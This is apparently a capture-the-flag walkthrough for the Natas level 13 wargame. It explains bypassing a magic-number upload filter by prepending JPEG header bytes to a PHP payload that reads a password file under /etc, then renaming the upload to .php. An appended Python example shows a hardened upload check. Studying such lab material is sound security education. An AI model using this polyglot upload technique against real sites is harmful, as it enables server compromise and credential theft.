People learn from their mistakes, and so does Natas. They heard that we were able to upload any file instead of a .jpg, so they made some changes and “improved” their security for this level. Have they even heard about magic numbers? Today those numbers are gonna do their magic for us.
First, open your terminal and hexdump any .jpg file. I just found this cutie on my laptop, so I'm gonna use it to see how the first bytes of a .jpg differ from those of other files (those leading bytes are the magic numbers, and a JPEG's always begin with ff d8 ff). So I'm gonna type: xxd -C nameofthephoto.jpg
Put the PHP that reads the next level's password into a file called natas13.php:
<?php echo file_get_contents("/etc/natas_webpass/natas14"); ?>
And now let's make a .jpg file that contains just the magic numbers:
echo -e "\xff\xd8\xff\xe0\n" > newfile.jpg
Then we merge the two files, so the PHP follows the JPEG header:
cat natas13.php >> newfile.jpg
The rest is the same as before: upload the file, change the name to .php in the request (now you like Burp Suite more, right?) and enjoy the moment. Come back for the next level.
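For the defender's side, here is an added Python example (not code from the post or from Natas) contrasting the level's magic-number-only check with a hardened upload check that also verifies the trailer, refuses embedded PHP tags and assigns the stored extension server-side. The function names and sample blobs are constructed for illustration; the polyglot mirrors the header-plus-PHP layout built above.

```python
import re
import uuid

# A JPEG starts with the SOI marker ff d8 ff; the fourth byte names the first
# APPn segment (e0 for JFIF, e1 for Exif). A magic-number check reads only this.
JPEG_MAGIC = b"\xff\xd8\xff"
JPEG_EOI = b"\xff\xd9"
# Opening tags the PHP interpreter would act on if it ever executed the upload.
PHP_OPEN_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)


def looks_like_jpeg(data: bytes) -> bool:
    """The level's 'improved' defence: trust the first bytes and nothing else."""
    return data.startswith(JPEG_MAGIC)


def hardened_upload_check(data: bytes, requested_name: str) -> tuple:
    """Return (accepted, stored_name).

    Rejects header-only polyglots and never lets the client pick the extension:
    the stored name is generated server-side from the detected type, so renaming
    the upload to .php in the request (as done in the level) changes nothing.
    """
    if not looks_like_jpeg(data):
        return False, ""
    # A complete JPEG ends with the EOI marker; text appended to a bare header does not.
    if not data.endswith(JPEG_EOI):
        return False, ""
    # Reject anything carrying PHP code, even if a fake trailer was added.
    if PHP_OPEN_TAG.search(data):
        return False, ""
    # requested_name is deliberately ignored for the extension (assumption: a real
    # handler would only log it); the detected type decides the stored name.
    stored_name = f"{uuid.uuid4().hex}.jpg"
    return True, stored_name


# Constructed samples (not real files): a minimal JPEG-shaped blob and the
# header-plus-PHP polyglot from the post, with and without a fake trailer.
REAL_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16 + JPEG_EOI
POLYGLOT = b"\xff\xd8\xff\xe0\n<?php echo 'not an image'; ?>\n"
WRAPPED_POLYGLOT = POLYGLOT + JPEG_EOI

if __name__ == "__main__":
    for label, blob in [("real", REAL_JPEG), ("polyglot", POLYGLOT), ("wrapped", WRAPPED_POLYGLOT)]:
        print(label, looks_like_jpeg(blob), hardened_upload_check(blob, "newfile.php")[0])
```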
I thought it was supposed to be easier…